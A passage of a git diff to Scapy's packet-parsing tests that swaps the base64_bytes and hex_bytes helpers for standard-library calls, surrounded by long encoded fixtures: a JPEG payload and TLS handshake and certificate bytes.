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' -assert a[29].load == base64_bytes(wireshark_data) +assert a[29].load == base64.b64decode(wireshark_data) # This a valid JPEG image: try it out # open("image.jpg", "wb").write(a[29].load) diff --git a/test/scapy/layers/tls/tls.uts b/test/scapy/layers/tls/tls.uts index 8dd1f2ba25c..95a7c34a348 100644 --- a/test/scapy/layers/tls/tls.uts +++ b/test/scapy/layers/tls/tls.uts @@ -987,9 +987,9 @@ rec_fin.msg[0].load == b'7\\)`\xaa`\x7ff\xcd\x10\xa9v\xa3*\x17\x1a' from scapy.layers.tls.record import TLS from scapy.layers.tls.handshake import TLSClientKeyExchange -cli_hello = hex_bytes('160303008f0100008b0303000027104268d53e923ce05aa04cb21b8fe33aed93266c00bd1f13ea6a6dad24000018c02cc02bc030c02fc024c023c028c027c00ac009c014c0130100004a00000013001100000e7777772e676f6f676c652e636f6d000500050100000000000a00080006001d00170018000b00020100000d00140012040105010201040305030203020206010603') -ser_hello = hex_bytes('16030300520200004e03035f9b52e4206fdc2410d1d482905c9b45a204641d9d856afb444f574e4752440120c4d1479e11a26edf0dbcb07e7a5f7d41c3d7b500015ff8c1ceed473bf457b193c02b000006000b0002010016030309270b0009230009200004cc308204c8308203b0a003020102021100b2fe3f66ac447c9f02000000007d9a03300d06092a864886f70d01010b05003042310b3009060355040613025553311e301c060355040a1315476f6f676c65205472757374205365727669636573311330110603550403130a47545320434120314f31301e170d3230313030363036343132305a170d3230313232393036343132305a3068310b3009060355040613025553311330110603550408130a43616c69666f726e6961311630140603550407130d4d6f756e7461696e205669657731133011060355040a130a476f6f676c65204c4c43311730150603550403130e7777772e676f6f676c652e636f6d3059301306072a8648ce3d020106082a8648ce3d030107034200046a7c4a9d35904b2b1b3f7c7326ff2adfb1bcb273b2a1a02003978dd1df8cecce5094e2309201fcd2294270ef359f4bdea177665d9e7321586682392ccc93ac89a382025c30820258300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070301300c0603551d130101ff04023000301d0603551d0e041604145d7ced1d850e92337bf7a0602ae3dd70668b895b301f0603551d2304183016801498d1f86e10ebcf9bec609f18901ba0eb7d09fd2b306806082b06010505070101045c305a302b06082b06010505073001861f687474703a2f2f6f6373702e706b692e676f6f672f677473316f31636f7265302b06082b06010505073002861f687474703a2f2f706b692e676f6f672f677372322f475453314f312e63727430190603551d1104123010820e7777772e676f6f676c652e636f6d30210603551d20041a30183008060667810c010202300c060a2b06010401d67902050330330603551d1f042c302a3028a026a0248622687474703a2f2f63726c2e706b692e676f6f672f475453314f31636f72652e63726c30820104060a2b06010401d6790204020481f50481f200f0007600b21e05cc8ba2cd8a204e8766f92bb98a2520676bdafa70e7b249532def8b905e00000174fcdb8af4000004030047304502207610c2e9b008b8ebf2f27a1e65631b8ae7534294c60f55a4c78c9e4927f56a23022100b61c72d94468cd6b4e376ea5d2ba7a6605a765c575f6a536b819a2d8031be4f7007600e712f2b0377e1a62fb8ec90c6184f1ea7b37cb561d11265bf3e0f34bf241546e00000174fcdb8af7000004030047304502204aae6373290fd01ad53e8ff9d6ef4f21d0badc0e65fef15c52c8f6af9468e12f022100c77dff6b266313b172ef8815beff3032d6058129baaa767361fe95e2c541ad81300d06092a864886f70d01010b05000382010100657bfcc7fd99ffed6f032bb056dc7712ec3ea437cf17750db8527ae0dcdd630f3ec4b2b95b7d482cc3a94082351117e45362319a842556954160d34c9019cc3cd312073ce540d031c4bf197b924a139b0e91bffc168a80c1641834445c509d6edf2daf8a247b72104b184968ef25cc260c75b28f470fc355477ac403da12701556e6e7550a38346f444238a154f1efb1a1a297eff39e35d76bc285599d19b0bd475d6f1daba94f1365dbc930041a79ca2df1bb724d53e4fb8831b8dc486522ee7d8eee0e1fea658352736fe949fcb233c08a3b9e14abc56a5556f9b469925cb5916ed058a4cf332c4c13a75ca83850773f9182ad95fadff51203c08e684df63b00044e3082044a30820332a003020102020d01e3b49aa18d8aa981256950b8300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d205232311330110603') -ser_cert = hex_bytes('16030309270b0009230009200004cc308204c8308203b0a003020102021100b2fe3f66ac447c9f02000000007d9a03300d06092a864886f70d01010b05003042310b3009060355040613025553311e301c060355040a1315476f6f676c65205472757374205365727669636573311330110603550403130a47545320434120314f31301e170d3230313030363036343132305a170d3230313232393036343132305a3068310b3009060355040613025553311330110603550408130a43616c69666f726e6961311630140603550407130d4d6f756e7461696e205669657731133011060355040a130a476f6f676c65204c4c43311730150603550403130e7777772e676f6f676c652e636f6d3059301306072a8648ce3d020106082a8648ce3d030107034200046a7c4a9d35904b2b1b3f7c7326ff2adfb1bcb273b2a1a02003978dd1df8cecce5094e2309201fcd2294270ef359f4bdea177665d9e7321586682392ccc93ac89a382025c30820258300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070301300c0603551d130101ff04023000301d0603551d0e041604145d7ced1d850e92337bf7a0602ae3dd70668b895b301f0603551d2304183016801498d1f86e10ebcf9bec609f18901ba0eb7d09fd2b306806082b06010505070101045c305a302b06082b06010505073001861f687474703a2f2f6f6373702e706b692e676f6f672f677473316f31636f7265302b06082b06010505073002861f687474703a2f2f706b692e676f6f672f677372322f475453314f312e63727430190603551d1104123010820e7777772e676f6f676c652e636f6d30210603551d20041a30183008060667810c010202300c060a2b06010401d67902050330330603551d1f042c302a3028a026a0248622687474703a2f2f63726c2e706b692e676f6f672f475453314f31636f72652e63726c30820104060a2b06010401d6790204020481f50481f200f0007600b21e05cc8ba2cd8a204e8766f92bb98a2520676bdafa70e7b249532def8b905e00000174fcdb8af4000004030047304502207610c2e9b008b8ebf2f27a1e65631b8ae7534294c60f55a4c78c9e4927f56a23022100b61c72d94468cd6b4e376ea5d2ba7a6605a765c575f6a536b819a2d8031be4f7007600e712f2b0377e1a62fb8ec90c6184f1ea7b37cb561d11265bf3e0f34bf241546e00000174fcdb8af7000004030047304502204aae6373290fd01ad53e8ff9d6ef4f21d0badc0e65fef15c52c8f6af9468e12f022100c77dff6b266313b172ef8815beff3032d6058129baaa767361fe95e2c541ad81300d06092a864886f70d01010b05000382010100657bfcc7fd99ffed6f032bb056dc7712ec3ea437cf17750db8527ae0dcdd630f3ec4b2b95b7d482cc3a94082351117e45362319a842556954160d34c9019cc3cd312073ce540d031c4bf197b924a139b0e91bffc168a80c1641834445c509d6edf2daf8a247b72104b184968ef25cc260c75b28f470fc355477ac403da12701556e6e7550a38346f444238a154f1efb1a1a297eff39e35d76bc285599d19b0bd475d6f1daba94f1365dbc930041a79ca2df1bb724d53e4fb8831b8dc486522ee7d8eee0e1fea658352736fe949fcb233c08a3b9e14abc56a5556f9b469925cb5916ed058a4cf332c4c13a75ca83850773f9182ad95fadff51203c08e684df63b00044e3082044a30820332a003020102020d01e3b49aa18d8aa981256950b8300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523231133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3137303631353030303034325a170d3231313231353030303034325a3042310b3009060355040613025553311e301c060355040a1315476f6f676c65205472757374205365727669636573311330110603550403130a47545320434120314f3130820122300d06092a864886f70d01010105000382010f003082010a0282010100d018cf45d48bcdd39ce440ef7eb4dd69211bc9cf3c8e4c75b90f3119843d9e3c29ef500d10936f0580809f2aa0bd124b02e13d9f581624fe309f0b747755931d4bf74de1928210f651ac0cc3b222940f346b981049e70b9d8339dd20c61c2defd1186165e7238320a82312ffd2247fd42fe7446a5b4dd75066b0af9e426305fbe01cc46361af9f6a33ff6297bd48d9d37c1467dc75dc2e69e8f86d7869d0b71005b8f131c23b24fd1a3374f823e0ec6b198a16c6e3cda4cd0bdbb3a4596038883bad1db9c68ca7531bfcbcd9a4abbcdd3c61d7931598ee81bd8fe264472040064ed7ac97e8b9c05912a1492523e4ed70342ca5b4637cf9a33d83d1cd6d24ac070203010001a38201333082012f300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b0601050507030230120603551d130101ff040830060101ff020100301d0603551d0e0416041498d1f86e10ebcf9bec609f18901ba0eb7d09fd2b301f0603551d230418301680149be20757671c1ec06a06de59b49a2ddfdc19862e303506082b0601050507010104293027302506082b060105050730018619687474703a2f2f6f6373702e706b692e676f6f672f6773723230320603551d1f042b30293027a025a0238621687474703a2f2f63726c2e706b692e676f6f672f677372322f677372322e63726c303f0603551d20043830363034060667810c010202302a302806082b06010505070201161c68747470733a2f2f706b692e676f6f672f7265706f7369746f72792f300d06092a864886f70d01010b050003820101001a803e3679fbf32ea946377d5e541635aec74e0899febdd13469265266073d0aba49cb62f4f11a8efc114f68964c742bd367deb2a3aa058d844d4c20650fa596da0d16f86c3bdb6f0423886b3a6cc160bd689f718eee2d583407f0d554e98659fd7b5e0d2194f58cc9a8f8d8f2adcc0f1af39aa7a90427f9a3c9b0ff02786b61bac7352be856fa4fc31c0cedb63cb44beaedcce13cecdc0d8cd63e9bca42588bcc16211740bca2d666efdac4155bcd89aa9b0926e732d20d6e6720025b10b090099c0c1f9eadd83beaa1fc6ce8105c085219512a71bbac7ab5dd15ed2bc9082a2c8ab4a621ab63ffd7524950d089b7adf2affb50ae2fe1950df346ad9d9cf5ca') +cli_hello = bytes.fromhex('160303008f0100008b0303000027104268d53e923ce05aa04cb21b8fe33aed93266c00bd1f13ea6a6dad24000018c02cc02bc030c02fc024c023c028c027c00ac009c014c0130100004a00000013001100000e7777772e676f6f676c652e636f6d000500050100000000000a00080006001d00170018000b00020100000d00140012040105010201040305030203020206010603') +ser_hello = bytes.fromhex('16030300520200004e03035f9b52e4206fdc2410d1d482905c9b45a204641d9d856afb444f574e4752440120c4d1479e11a26edf0dbcb07e7a5f7d41c3d7b500015ff8c1ceed473bf457b193c02b000006000b0002010016030309270b0009230009200004cc308204c8308203b0a003020102021100b2fe3f66ac447c9f02000000007d9a03300d06092a864886f70d01010b05003042310b3009060355040613025553311e301c060355040a1315476f6f676c65205472757374205365727669636573311330110603550403130a47545320434120314f31301e170d3230313030363036343132305a170d3230313232393036343132305a3068310b3009060355040613025553311330110603550408130a43616c69666f726e6961311630140603550407130d4d6f756e7461696e205669657731133011060355040a130a476f6f676c65204c4c43311730150603550403130e7777772e676f6f676c652e636f6d3059301306072a8648ce3d020106082a8648ce3d030107034200046a7c4a9d35904b2b1b3f7c7326ff2adfb1bcb273b2a1a02003978dd1df8cecce5094e2309201fcd2294270ef359f4bdea177665d9e7321586682392ccc93ac89a382025c30820258300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070301300c0603551d130101ff04023000301d0603551d0e041604145d7ced1d850e92337bf7a0602ae3dd70668b895b301f0603551d2304183016801498d1f86e10ebcf9bec609f18901ba0eb7d09fd2b306806082b06010505070101045c305a302b06082b06010505073001861f687474703a2f2f6f6373702e706b692e676f6f672f677473316f31636f7265302b06082b06010505073002861f687474703a2f2f706b692e676f6f672f677372322f475453314f312e63727430190603551d1104123010820e7777772e676f6f676c652e636f6d30210603551d20041a30183008060667810c010202300c060a2b06010401d67902050330330603551d1f042c302a3028a026a0248622687474703a2f2f63726c2e706b692e676f6f672f475453314f31636f72652e63726c30820104060a2b06010401d6790204020481f50481f200f0007600b21e05cc8ba2cd8a204e8766f92bb98a2520676bdafa70e7b249532def8b905e00000174fcdb8af4000004030047304502207610c2e9b008b8ebf2f27a1e65631b8ae7534294c60f55a4c78c9e4927f56a23022100b61c72d94468cd6b4e376ea5d2ba7a6605a765c575f6a536b819a2d8031be4f7007600e712f2b0377e1a62fb8ec90c6184f1ea7b37cb561d11265bf3e0f34bf241546e00000174fcdb8af7000004030047304502204aae6373290fd01ad53e8ff9d6ef4f21d0badc0e65fef15c52c8f6af9468e12f022100c77dff6b266313b172ef8815beff3032d6058129baaa767361fe95e2c541ad81300d06092a864886f70d01010b05000382010100657bfcc7fd99ffed6f032bb056dc7712ec3ea437cf17750db8527ae0dcdd630f3ec4b2b95b7d482cc3a94082351117e45362319a842556954160d34c9019cc3cd312073ce540d031c4bf197b924a139b0e91bffc168a80c1641834445c509d6edf2daf8a247b72104b184968ef25cc260c75b28f470fc355477ac403da12701556e6e7550a38346f444238a154f1efb1a1a297eff39e35d76bc285599d19b0bd475d6f1daba94f1365dbc930041a79ca2df1bb724d53e4fb8831b8dc486522ee7d8eee0e1fea658352736fe949fcb233c08a3b9e14abc56a5556f9b469925cb5916ed058a4cf332c4c13a75ca83850773f9182ad95fadff51203c08e684df63b00044e3082044a30820332a003020102020d01e3b49aa18d8aa981256950b8300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d205232311330110603') +ser_cert = bytes.fromhex('16030309270b0009230009200004cc308204c8308203b0a003020102021100b2fe3f66ac447c9f02000000007d9a03300d06092a864886f70d01010b05003042310b3009060355040613025553311e301c060355040a1315476f6f676c65205472757374205365727669636573311330110603550403130a47545320434120314f31301e170d3230313030363036343132305a170d3230313232393036343132305a3068310b3009060355040613025553311330110603550408130a43616c69666f726e6961311630140603550407130d4d6f756e7461696e205669657731133011060355040a130a476f6f676c65204c4c43311730150603550403130e7777772e676f6f676c652e636f6d3059301306072a8648ce3d020106082a8648ce3d030107034200046a7c4a9d35904b2b1b3f7c7326ff2adfb1bcb273b2a1a02003978dd1df8cecce5094e2309201fcd2294270ef359f4bdea177665d9e7321586682392ccc93ac89a382025c30820258300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070301300c0603551d130101ff04023000301d0603551d0e041604145d7ced1d850e92337bf7a0602ae3dd70668b895b301f0603551d2304183016801498d1f86e10ebcf9bec609f18901ba0eb7d09fd2b306806082b06010505070101045c305a302b06082b06010505073001861f687474703a2f2f6f6373702e706b692e676f6f672f677473316f31636f7265302b06082b06010505073002861f687474703a2f2f706b692e676f6f672f677372322f475453314f312e63727430190603551d1104123010820e7777772e676f6f676c652e636f6d30210603551d20041a30183008060667810c010202300c060a2b06010401d67902050330330603551d1f042c302a3028a026a0248622687474703a2f2f63726c2e706b692e676f6f672f475453314f31636f72652e63726c30820104060a2b06010401d6790204020481f50481f200f0007600b21e05cc8ba2cd8a204e8766f92bb98a2520676bdafa70e7b249532def8b905e00000174fcdb8af4000004030047304502207610c2e9b008b8ebf2f27a1e65631b8ae7534294c60f55a4c78c9e4927f56a23022100b61c72d94468cd6b4e376ea5d2ba7a6605a765c575f6a536b819a2d8031be4f7007600e712f2b0377e1a62fb8ec90c6184f1ea7b37cb561d11265bf3e0f34bf241546e00000174fcdb8af7000004030047304502204aae6373290fd01ad53e8ff9d6ef4f21d0badc0e65fef15c52c8f6af9468e12f022100c77dff6b266313b172ef8815beff3032d6058129baaa767361fe95e2c541ad81300d06092a864886f70d01010b05000382010100657bfcc7fd99ffed6f032bb056dc7712ec3ea437cf17750db8527ae0dcdd630f3ec4b2b95b7